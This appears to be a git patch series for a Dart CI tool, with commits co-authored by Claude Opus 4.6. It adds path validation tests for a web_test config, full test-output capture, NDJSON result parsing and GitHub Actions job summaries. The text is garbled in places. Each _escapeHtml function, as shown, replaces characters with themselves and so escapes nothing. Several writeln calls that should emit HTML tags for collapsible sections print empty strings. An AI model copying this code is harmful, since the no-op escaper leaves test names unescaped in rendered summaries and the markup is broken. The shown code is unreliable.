[r'test\web\foo_test.dart'], + }), + ); + expect(errors, anyElement(contains('forward slashes'))); + }); + + test('web_test.paths with unsupported characters produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web test/foo.dart'], + }), + ); + expect(errors, anyElement(contains('unsupported characters'))); + }); + + test('web_test.paths with leading whitespace produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': [' test/web/foo_test.dart'], + }), + ); + expect(errors, anyElement(contains('whitespace'))); + }); + + test('web_test.paths with tilde produces error', () { + final errors = WorkflowGenerator.validate( + 
_validConfig(webTest: { + 'paths': ['~/test/foo.dart'], + }), + ); + expect(errors, anyElement(contains('must be a relative repo path'))); + }); + + test('web_test.paths with newline produces error', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/foo\nbar.dart'], + }), + ); + expect(errors, anyElement(contains('newlines/tabs'))); + }); + + test('valid web_test.paths passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'paths': ['test/web/foo_test.dart', 'test/web/bar_test.dart'], + }), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('empty web_test.paths list is fine', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: {'paths': []}), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + + test('valid full web_test config passes', () { + final errors = WorkflowGenerator.validate( + _validConfig(webTest: { + 'concurrency': 2, + 'paths': ['test/web/'], + }), + ); + expect(errors.where((e) => e.contains('web_test')), isEmpty); + }); + }); + // ---- fully valid config produces no errors ---- test('fully valid config produces no errors', () { final errors = WorkflowGenerator.validate(_validConfig( dartSdk: '3.9.2', - features: {'proto': true, 'lfs': false}, + features: {'proto': true, 'lfs': false, 'web_test': true}, platforms: ['ubuntu', 'macos'], secrets: {'API_KEY': 'MY_SECRET'}, pat: 'MY_PAT', @@ -509,6 +667,7 @@ void main() { {'name': 'core', 'path': 'packages/core'}, ], runnerOverrides: {'ubuntu': 'custom-runner'}, + webTest: {'concurrency': 2, 'paths': ['test/web/']}, )); expect(errors, isEmpty); }); From 82fbad0a34c2ab84c91910a72d4942ef6abd3996 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 17:18:27 -0500 Subject: [PATCH 02/16] feat: enhanced managed test with full output capture and rich job summaries Two-layer capture strategy for comprehensive test output: - Layer 1 (zone-aware): 
--file-reporter json: captures all print() calls as PrintEvent objects with test attribution, --file-reporter expanded: captures human-readable output with all prints for all tests - Layer 2 (shell-level): 2>&1 | tee in CI template captures stdout.write(), isolate prints, and FFI output that bypass Dart zones TestCommand (live CI path via bin/manage_cicd.dart) now: - Uses Process.start() with piped streams for real-time + captured output - Writes structured logs to TEST_LOG_DIR (CI) or .dart_tool/test-logs/ - Parses NDJSON results for per-test pass/fail/skip with durations - Generates rich GitHub Actions job summaries with alert boxes, tables, and collapsible per-failure details (error, stack trace, captured prints) - Accumulates multiple errors per test (e.g. test + tearDown failures) - Dynamic code fence delimiters to prevent backtick injection - Cross-platform process.kill() (no ProcessSignal.sigkill on Windows) - UTF-8 decoder (dart test always outputs UTF-8) - 45-minute process timeout with 30-second stream drain timeout CI template updates: - shell: bash + set -o pipefail for cross-platform consistency - TEST_LOG_DIR env var passes log directory to Dart command - Artifact upload with if: always() and 14-day retention - Separate managed/unmanaged artifact upload paths Co-Authored-By: Claude Opus 4.6 --- lib/src/cli/commands/test_command.dart | 376 +++++++++++++++++++++++-- lib/src/cli/manage_cicd.dart | 126 +++++---- 2 files changed, 434 insertions(+), 68 deletions(-) diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 18c73ed..93a322d 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -1,4 +1,5 @@ import 'dart:async'; +import 'dart:convert'; import 'dart:io'; import 'package:args/command_runner.dart'; @@ -8,13 +9,24 @@ import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/sub_package_utils.dart'; -/// Run `dart test` on the root package 
and all configured sub-packages. +/// Run `dart test` on the root package and all configured sub-packages with +/// full output capture (two-layer strategy). +/// +/// **Layer 1 — Zone-aware reporters:** `--file-reporter json:` captures all +/// `print()` calls as `PrintEvent` objects with test attribution, and +/// `--file-reporter expanded:` captures human-readable output. +/// +/// **Layer 2 — Shell-level `tee`:** Configured in the CI template to capture +/// anything that bypasses Dart zones (`stdout.write()`, isolate prints, FFI). +/// +/// All log files are written to `$TEST_LOG_DIR` (set by CI template) or +/// `/.dart_tool/test-logs/` locally. class TestCommand extends Command { @override final String name = 'test'; @override - final String description = 'Run dart test.'; + final String description = 'Run dart test with full output capture and job summary.'; @override Future run() async { @@ -29,34 +41,82 @@ class TestCommand extends Command { const processTimeout = Duration(minutes: 45); final failures = []; + // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) + final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + Directory(logDir).createSync(recursive: true); + Logger.info('Log directory: $logDir'); + + final jsonPath = '$logDir/results.json'; + final expandedPath = '$logDir/expanded.txt'; + // Skip gracefully if no test/ directory exists final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { Logger.success('No test/ directory found — skipping root tests'); + _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); } else { - // Use Process.start for streaming output instead of Process.runSync. - // This ensures real-time output in CI (runSync buffers everything until - // exit, so a hanging test produces zero output). 
- final process = await Process.start( - Platform.resolvedExecutable, - ['test', '--exclude-tags', 'gcp,integration'], - workingDirectory: repoRoot, - mode: ProcessStartMode.inheritStdio, - ); + // Build test arguments with two file reporters + expanded console output + final testArgs = [ + 'test', + '--exclude-tags', + 'gcp,integration', + '--chain-stack-traces', + '--reporter', + 'expanded', + '--file-reporter', + 'json:$jsonPath', + '--file-reporter', + 'expanded:$expandedPath', + ]; + + Logger.info('Running: dart ${testArgs.join(' ')}'); + + // Use Process.start with piped output so we can both stream to console + // AND capture the full output for summary generation. + final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + + // Stream stdout and stderr to console in real-time while capturing + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + + final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { + stdout.write(data); + stdoutBuf.write(data); + }).asFuture(); + + final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { + stderr.write(data); + stderrBuf.write(data); + }).asFuture(); // Process-level timeout: kill the test process if it exceeds 45 minutes. - // Individual test timeouts should catch hangs, but this is a safety net - // for cases where the test process itself doesn't exit (e.g., leaked - // isolates, open sockets keeping the event loop alive). final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(ProcessSignal.sigkill); + process.kill(); // No signal arg — cross-platform safe return -1; }, ); + try { + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + } catch (_) { + // Ignore stream errors (e.g. 
process killed before streams drained) + } + + // Write console output to log files + File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + File('$logDir/dart_stderr.log').writeAsStringSync(stderrBuf.toString()); + } + + // Parse the JSON results file for structured test data + final results = _parseTestResultsJson(jsonPath); + + // Generate and write the rich job summary + _writeTestJobSummary(results, exitCode, logDir); + if (exitCode != 0) { Logger.error('Root tests failed with exit code $exitCode'); failures.add(config.repoName); @@ -121,7 +181,7 @@ class TestCommand extends Command { processTimeout, onTimeout: () { Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - spProcess.kill(ProcessSignal.sigkill); + spProcess.kill(); // No signal arg — cross-platform safe return -1; }, ); @@ -142,3 +202,287 @@ class TestCommand extends Command { Logger.success('All tests passed'); } } + +// ── NDJSON Parsing ──────────────────────────────────────────────────────────── + +/// A single test failure with its error, stack trace, and captured print output. +class _TestFailure { + final String name; + final String error; + final String stackTrace; + final String printOutput; + final int durationMs; + + _TestFailure({ + required this.name, + required this.error, + required this.stackTrace, + required this.printOutput, + required this.durationMs, + }); +} + +/// Parsed results from the NDJSON test results file. +class _TestResults { + int passed = 0; + int failed = 0; + int skipped = 0; + int totalDurationMs = 0; + final List<_TestFailure> failures = []; + bool parsed = false; +} + +/// Parse the NDJSON file produced by `--file-reporter json:`. +/// +/// Each line is a JSON object with a `type` field. 
We track: +/// - `testStart`: register test name + start time +/// - `testDone`: record result, compute duration +/// - `error`: capture error message + stack trace (accumulated per test) +/// - `print`: capture print output, attribute to testID +/// - `done`: overall total time +_TestResults _parseTestResultsJson(String jsonPath) { + final results = _TestResults(); + final file = File(jsonPath); + if (!file.existsSync()) { + Logger.warn('No JSON results file found at $jsonPath'); + return results; + } + + results.parsed = true; + + // Tracking maps keyed by testID + final testNames = {}; + final testStartTimes = {}; + final testErrors = {}; + final testStackTraces = {}; + final testPrints = {}; + + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { + final event = jsonDecode(line) as Map; + final type = event['type'] as String?; + + switch (type) { + case 'testStart': + final test = event['test'] as Map?; + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; + + case 'testDone': + final id = event['testID'] as int?; + if (id == null) break; + final resultStr = event['result'] as String?; + final hidden = event['hidden'] as bool? ?? false; + final skipped = event['skipped'] as bool? ?? false; + + // Skip synthetic/hidden entries (group-level loading events) + if (hidden) break; + + if (skipped) { + results.skipped++; + } else if (resultStr == 'success') { + results.passed++; + } else if (resultStr == 'failure' || resultStr == 'error') { + results.failed++; + final startTime = testStartTimes[id] ?? 0; + final endTime = event['time'] as int? ?? 0; + results.failures.add( + _TestFailure( + name: testNames[id] ?? 'unknown', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', + printOutput: testPrints[id]?.toString() ?? 
'', + durationMs: endTime - startTime, + ), + ); + } + + case 'error': + final id = event['testID'] as int?; + if (id == null) break; + // Accumulate multiple errors per test (e.g. test failure + tearDown exception) + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + // Skip malformed JSON lines but continue parsing the rest + Logger.warn('Skipping malformed JSON line: $e'); + } + } + + return results; +} + +// ── Job Summary ─────────────────────────────────────────────────────────────── + +/// Generate a rich GitHub Actions job summary from parsed test results. +void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { + final buf = StringBuffer(); + + // Determine platform identifier for the heading + final platformId = + Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; + + buf.writeln('## Test Results — $platformId'); + buf.writeln(); + + if (!results.parsed) { + // Fallback: no JSON file was produced (test binary crashed before writing) + final status = exitCode == 0 ? 'passed' : 'failed'; + final icon = exitCode == 0 ? 
'NOTE' : 'CAUTION'; + buf.writeln('> [!$icon]'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); + buf.writeln(_artifactLink(':package: View full test logs')); + _writeStepSummary(buf.toString()); + return; + } + + final total = results.passed + results.failed + results.skipped; + final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); + + // Status banner — alert box lines must all be prefixed with > + if (results.failed == 0) { + buf.writeln('> [!NOTE]'); + buf.writeln('> All $total tests passed in ${durationSec}s'); + } else { + buf.writeln('> [!CAUTION]'); + buf.writeln('> ${results.failed} of $total tests failed'); + } + buf.writeln(); + + // Summary table + buf.writeln('| Status | Count |'); + buf.writeln('|--------|------:|'); + buf.writeln('| :white_check_mark: Passed | ${results.passed} |'); + buf.writeln('| :x: Failed | ${results.failed} |'); + buf.writeln('| :fast_forward: Skipped | ${results.skipped} |'); + buf.writeln('| **Total** | **$total** |'); + buf.writeln('| **Duration** | **${durationSec}s** |'); + buf.writeln(); + + // Failed test details + if (results.failures.isNotEmpty) { + buf.writeln('### Failed Tests'); + buf.writeln(); + + // Cap at 20 failures to avoid exceeding the 1 MiB summary limit + final displayFailures = results.failures.take(20).toList(); + for (final f in displayFailures) { + final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; + buf.writeln('
'); + buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); + buf.writeln(); + + if (f.error.isNotEmpty) { + // Truncate very long error messages + final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; + buf.writeln('**Error:**'); + final fence = _codeFence(error); + buf.writeln(fence); + buf.writeln(error); + buf.writeln(fence); + buf.writeln(); + } + + if (f.stackTrace.isNotEmpty) { + // Truncate very long stack traces + final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; + buf.writeln('**Stack Trace:**'); + final fence = _codeFence(stack); + buf.writeln(fence); + buf.writeln(stack); + buf.writeln(fence); + buf.writeln(); + } + + if (f.printOutput.isNotEmpty) { + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; + // Truncate captured output if it's very long + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; + buf.writeln('**Captured Output ($lineCount lines):**'); + final fence = _codeFence(printPreview); + buf.writeln(fence); + buf.writeln(printPreview); + buf.writeln(fence); + buf.writeln(); + } + + buf.writeln('
'); + buf.writeln(); + } + + if (results.failures.length > 20) { + buf.writeln( + '_...and ${results.failures.length - 20} more failures. ' + 'See test logs artifact for full details._', + ); + buf.writeln(); + } + } + + // Artifact link + buf.writeln('---'); + buf.writeln(_artifactLink(':package: View full test logs')); + buf.writeln(); + + _writeStepSummary(buf.toString()); +} + +// ── Helpers ─────────────────────────────────────────────────────────────────── + +/// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). +/// No-op when running locally (env var not set). +void _writeStepSummary(String markdown) { + final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; + if (summaryFile != null) { + File(summaryFile).writeAsStringSync(markdown, mode: FileMode.append); + } +} + +/// Build a link to the current workflow run's artifacts page. +String _artifactLink([String label = 'View all artifacts']) { + final server = Platform.environment['GITHUB_SERVER_URL'] ?? 'https://github.com'; + final repo = Platform.environment['GITHUB_REPOSITORY']; + final runId = Platform.environment['GITHUB_RUN_ID']; + if (repo == null || runId == null) return ''; + return '[$label]($server/$repo/actions/runs/$runId)'; +} + +/// Escape HTML special characters for safe embedding in GitHub markdown. +String _escapeHtml(String input) { + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); +} + +/// Choose a code fence delimiter that does not appear in [content]. +/// Starts with triple backticks and extends as needed. 
+String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; +} diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 8db2e7e..37a63b6 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2173,7 +2173,7 @@ Future _runTest(String repoRoot) async { final testArgs = [ 'test', '--exclude-tags', - 'gcp', + 'gcp,integration', '--chain-stack-traces', '--reporter', 'expanded', @@ -2194,28 +2194,28 @@ Future _runTest(String repoRoot) async { final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - final stdoutDone = process.stdout.transform(const SystemEncoding().decoder).listen((data) { + final stdoutDone = process.stdout.transform(utf8.decoder).listen((data) { stdout.write(data); stdoutBuf.write(data); }).asFuture(); - final stderrDone = process.stderr.transform(const SystemEncoding().decoder).listen((data) { + final stderrDone = process.stderr.transform(utf8.decoder).listen((data) { stderr.write(data); stderrBuf.write(data); }).asFuture(); - // Wait for streams to drain and process to exit (45-min safety timeout) + // Wait for process to exit (45-min safety timeout) const processTimeout = Duration(minutes: 45); final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(ProcessSignal.sigkill); + process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([stdoutDone, stderrDone]); + await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. 
process killed before streams drained) } @@ -2287,31 +2287,25 @@ _TestResults _parseTestResultsJson(String jsonPath) { // Tracking maps keyed by testID final testNames = {}; final testStartTimes = {}; - final testErrors = {}; - final testStackTraces = {}; + final testErrors = {}; + final testStackTraces = {}; final testPrints = {}; - final skippedTests = {}; - try { - final lines = file.readAsLinesSync(); - for (final line in lines) { - if (line.trim().isEmpty) continue; + final lines = file.readAsLinesSync(); + for (final line in lines) { + if (line.trim().isEmpty) continue; + try { final event = jsonDecode(line) as Map; final type = event['type'] as String?; switch (type) { case 'testStart': final test = event['test'] as Map?; - if (test != null) { - final id = test['id'] as int; - testNames[id] = test['name'] as String? ?? 'unknown'; - testStartTimes[id] = event['time'] as int? ?? 0; - // Detect group-level "loading" entries (no real test) - final metadata = test['metadata'] as Map?; - if (metadata != null && metadata['skip'] == true) { - skippedTests[id] = true; - } - } + if (test == null) break; + final id = test['id'] as int?; + if (id == null) break; + testNames[id] = test['name'] as String? ?? 'unknown'; + testStartTimes[id] = event['time'] as int? ?? 0; case 'testDone': final id = event['testID'] as int?; @@ -2323,7 +2317,7 @@ _TestResults _parseTestResultsJson(String jsonPath) { // Skip synthetic/hidden entries (group-level loading events) if (hidden) break; - if (skipped || skippedTests[id] == true) { + if (skipped) { results.skipped++; } else if (resultStr == 'success') { results.passed++; @@ -2334,8 +2328,8 @@ _TestResults _parseTestResultsJson(String jsonPath) { results.failures.add( _TestFailure( name: testNames[id] ?? 'unknown', - error: testErrors[id] ?? '', - stackTrace: testStackTraces[id] ?? '', + error: testErrors[id]?.toString() ?? '', + stackTrace: testStackTraces[id]?.toString() ?? '', printOutput: testPrints[id]?.toString() ?? 
'', durationMs: endTime - startTime, ), @@ -2345,8 +2339,13 @@ _TestResults _parseTestResultsJson(String jsonPath) { case 'error': final id = event['testID'] as int?; if (id == null) break; - testErrors[id] = event['error'] as String? ?? ''; - testStackTraces[id] = event['stackTrace'] as String? ?? ''; + // Accumulate multiple errors per test (e.g. test failure + tearDown exception) + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); case 'print': final id = event['testID'] as int?; @@ -2359,9 +2358,10 @@ _TestResults _parseTestResultsJson(String jsonPath) { final time = event['time'] as int? ?? 0; results.totalDurationMs = time; } + } catch (e) { + // Skip malformed JSON lines but continue parsing the rest + _warn('Skipping malformed JSON line: $e'); } - } catch (e) { - _warn('Failed to parse JSON results: $e'); } return results; @@ -2375,15 +2375,18 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { final platformId = Platform.environment['PLATFORM_ID'] ?? Platform.environment['RUNNER_NAME'] ?? Platform.operatingSystem; - buf.writeln('## Test Results — $platformId\n'); + buf.writeln('## Test Results — $platformId'); + buf.writeln(); if (!results.parsed) { // Fallback: no JSON file was produced (test binary crashed before writing) final status = exitCode == 0 ? 'passed' : 'failed'; final icon = exitCode == 0 ? 
'NOTE' : 'CAUTION'; buf.writeln('> [!$icon]'); - buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.\n'); - buf.writeln('Check the expanded output in test logs for details.\n'); + buf.writeln('> Tests $status (exit code $exitCode) — no structured results available.'); + buf.writeln(); + buf.writeln('Check the expanded output in test logs for details.'); + buf.writeln(); buf.writeln(_artifactLink(':package: View full test logs')); _writeStepSummary(buf.toString()); return; @@ -2392,14 +2395,15 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { final total = results.passed + results.failed + results.skipped; final durationSec = (results.totalDurationMs / 1000).toStringAsFixed(1); - // Status banner + // Status banner — alert box lines must all be prefixed with > if (results.failed == 0) { buf.writeln('> [!NOTE]'); - buf.writeln('> All $total tests passed in ${durationSec}s\n'); + buf.writeln('> All $total tests passed in ${durationSec}s'); } else { buf.writeln('> [!CAUTION]'); - buf.writeln('> ${results.failed} of $total tests failed\n'); + buf.writeln('> ${results.failed} of $total tests failed'); } + buf.writeln(); // Summary table buf.writeln('| Status | Count |'); @@ -2413,54 +2417,62 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { // Failed test details if (results.failures.isNotEmpty) { - buf.writeln('### Failed Tests\n'); + buf.writeln('### Failed Tests'); + buf.writeln(); // Cap at 20 failures to avoid exceeding the 1 MiB summary limit final displayFailures = results.failures.take(20).toList(); for (final f in displayFailures) { final durStr = f.durationMs > 0 ? ' (${f.durationMs}ms)' : ''; buf.writeln('
'); - buf.writeln(':x: ${_escapeHtml(f.name)}$durStr\n'); + buf.writeln(':x: ${_escapeHtml(f.name)}$durStr'); + buf.writeln(); if (f.error.isNotEmpty) { // Truncate very long error messages final error = f.error.length > 2000 ? '${f.error.substring(0, 2000)}\n... (truncated)' : f.error; buf.writeln('**Error:**'); - buf.writeln('```'); + final errorFence = _codeFence(error); + buf.writeln(errorFence); buf.writeln(error); - buf.writeln('```\n'); + buf.writeln(errorFence); + buf.writeln(); } if (f.stackTrace.isNotEmpty) { // Truncate very long stack traces final stack = f.stackTrace.length > 1500 ? '${f.stackTrace.substring(0, 1500)}\n... (truncated)' : f.stackTrace; buf.writeln('**Stack Trace:**'); - buf.writeln('```'); + final stackFence = _codeFence(stack); + buf.writeln(stackFence); buf.writeln(stack); - buf.writeln('```\n'); + buf.writeln(stackFence); + buf.writeln(); } if (f.printOutput.isNotEmpty) { - final printLines = f.printOutput.split('\n'); - final lineCount = printLines.length; + final trimmed = f.printOutput.trimRight(); + final lineCount = trimmed.split('\n').length; // Truncate captured output if it's very long - final printPreview = f.printOutput.length > 1500 - ? '${f.printOutput.substring(0, 1500)}\n... (truncated)' - : f.printOutput.trimRight(); + final printPreview = trimmed.length > 1500 ? '${trimmed.substring(0, 1500)}\n... (truncated)' : trimmed; buf.writeln('**Captured Output ($lineCount lines):**'); - buf.writeln('```'); + final printFence = _codeFence(printPreview); + buf.writeln(printFence); buf.writeln(printPreview); - buf.writeln('```\n'); + buf.writeln(printFence); + buf.writeln(); } - buf.writeln('
\n'); + buf.writeln(''); + buf.writeln(); } if (results.failures.length > 20) { buf.writeln( '_...and ${results.failures.length - 20} more failures. ' - 'See test logs artifact for full details._\n', + 'See test logs artifact for full details._', ); + buf.writeln(); } } @@ -2474,7 +2486,17 @@ void _writeTestJobSummary(_TestResults results, int exitCode, String logDir) { /// Escape HTML special characters for safe embedding in GitHub markdown. String _escapeHtml(String input) { - return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>'); + return input.replaceAll('&', '&').replaceAll('<', '<').replaceAll('>', '>').replaceAll('"', '"'); +} + +/// Choose a code fence delimiter that does not appear in [content]. +/// Starts with triple backticks and extends as needed. +String _codeFence(String content) { + var fence = '```'; + while (content.contains(fence)) { + fence += '`'; + } + return fence; } /// Run dart analyze and fail only on actual errors. From 0b65313bd3bc778c1c5d7195f54974c52daffc22 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 18:32:26 -0500 Subject: [PATCH 03/16] fix: harden web_test validation, extract shared test utils, and expand test coverage Address all findings from PR #29 code review: - Add validate() guard in render() for defense-in-depth against shell injection - Cap web_test concurrency at 32 (Chrome instances are heavy) - Detect duplicate paths, unknown keys, and cross-validate feature vs config - Shell-quote and normalize web_test paths in rendered output - HTML-escape platformId in GitHub step summaries - Add sync comments and proto setup to web-test job template - Extract duplicated TestFailure/TestResults/parsing into shared test_results_util - Add escapeHtml to StepSummary utility class - Add 15+ new validation tests (traversal, shell metacharacters, duplicates, etc.) 
- Update SETUP.md concurrency range and paths wording Co-Authored-By: Claude Opus 4.6 --- SETUP.md | 6 +- USAGE.md | 16 +- lib/src/cli/commands/test_command.dart | 284 +------------------- lib/src/cli/manage_cicd.dart | 265 +----------------- lib/src/cli/utils/step_summary.dart | 5 + lib/src/cli/utils/test_results_util.dart | 262 ++++++++++++++++++ lib/src/cli/utils/workflow_generator.dart | 91 +++++-- templates/github/workflows/ci.skeleton.yaml | 13 + test/workflow_generator_test.dart | 259 +++++++++++++++++- 9 files changed, 617 insertions(+), 584 deletions(-) create mode 100644 lib/src/cli/utils/test_results_util.dart diff --git a/SETUP.md b/SETUP.md index 1f15342..4440965 100644 --- a/SETUP.md +++ b/SETUP.md @@ -312,10 +312,10 @@ The CI workflow (`.github/workflows/ci.yaml`) is generated from your `ci` sectio | `features.analysis_cache` | bool | `false` | Cache analysis results across runs | | `features.managed_analyze` | bool | `false` | Run `dart analyze` via tooling | | `features.managed_test` | bool | `false` | Run `dart test` via tooling | -| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze/test | +| `features.build_runner` | bool | `false` | Run `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test | | `features.web_test` | bool | `false` | Add a standalone `web-test` job that runs `dart test -p chrome` on Ubuntu | -| `web_test.concurrency` | int | `1` | Number of concurrent browser test suites | -| `web_test.paths` | list | `[]` | Specific test paths to run (empty = auto-discover all web-compatible tests) | +| `web_test.concurrency` | int | `1` | Number of concurrent browser test suites (1–32) | +| `web_test.paths` | list | `[]` | Specific test paths to run (empty = run all tests via `dart test -p chrome`) | | `platforms` | list | `["ubuntu"]` | Platform matrix. If 2+ entries, CI runs `analyze` once then `test` as a matrix. 
Valid: `ubuntu-x64`, `ubuntu-arm64`, `macos-arm64`, `macos-x64`, `windows-x64`, `windows-arm64` (plus aliases `ubuntu`, `macos`, `windows`). | | `runner_overrides` | object | `{}` | Override platform IDs to custom `runs-on` labels (e.g. org-managed GitHub-hosted runners). Example: `{ "ubuntu-arm64": "runtime-ubuntu-24.04-arm64-208gb-64core" }` | | `secrets` | object | `{}` | Additional secrets as `{ "ENV_NAME": "SECRET_NAME" }` | diff --git a/USAGE.md b/USAGE.md index 2190afa..4b8422e 100644 --- a/USAGE.md +++ b/USAGE.md @@ -501,14 +501,18 @@ dart run runtime_ci_tooling:manage_cicd create-release \ ### test -Run `dart test` excluding GCP-tagged tests. +Run `dart test` with enhanced output capture and job summary. ```bash dart run runtime_ci_tooling:manage_cicd test ``` -Runs `dart test --exclude-tags gcp`, parses output for pass/fail/skip counts, -and writes a GitHub Actions step summary. +**Enhanced managed test behavior (when `ci.features.managed_test=true`):** +- Excludes `gcp` and `integration` tags via `--exclude-tags gcp,integration` +- Uses JSON and expanded file reporters for full output capture (including `print()`, isolate output, FFI) +- Writes logs to `$TEST_LOG_DIR` (CI) or `.dart_tool/test-logs/` (local) +- Generates a rich GitHub Actions step summary with pass/fail/skip counts and failure details +- Runs tests in sub-packages (from `ci.sub_packages`) with `pub get` per package --- @@ -1256,8 +1260,10 @@ final exists = await commandExists('git'); - `ci.runner_overrides`: optional map to point platform IDs at custom `runs-on` labels (e.g. org-managed GitHub-hosted runners) **Optional features:** -- `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze and test steps to regenerate `.g.dart` codegen files -- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. 
Configure concurrency and test paths via `ci.web_test.concurrency` (default `1`) and `ci.web_test.paths` (default `[]` = auto-discover) +- `ci.features.build_runner`: When `true`, runs `dart run build_runner build --delete-conflicting-outputs` before analyze, test, and web-test steps to regenerate `.g.dart` codegen files +- `ci.features.web_test`: When `true`, adds a `web-test` job that provisions Chrome via `browser-actions/setup-chrome@v2` and runs `dart test -p chrome`. Configure via `ci.web_test`: + - `concurrency` (1–32, default `1`): parallel test shards + - `paths`: list of relative repo paths (e.g. `["test/web/"]`): paths are normalized, shell-quoted, and validated (no traversal, no shell metacharacters). Empty list = run all tests **Key steps:** ```yaml diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index 93a322d..73c3b60 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -8,6 +8,7 @@ import '../../triage/utils/config.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/sub_package_utils.dart'; +import '../utils/test_results_util.dart'; /// Run `dart test` on the root package and all configured sub-packages with /// full output capture (two-layer strategy). 
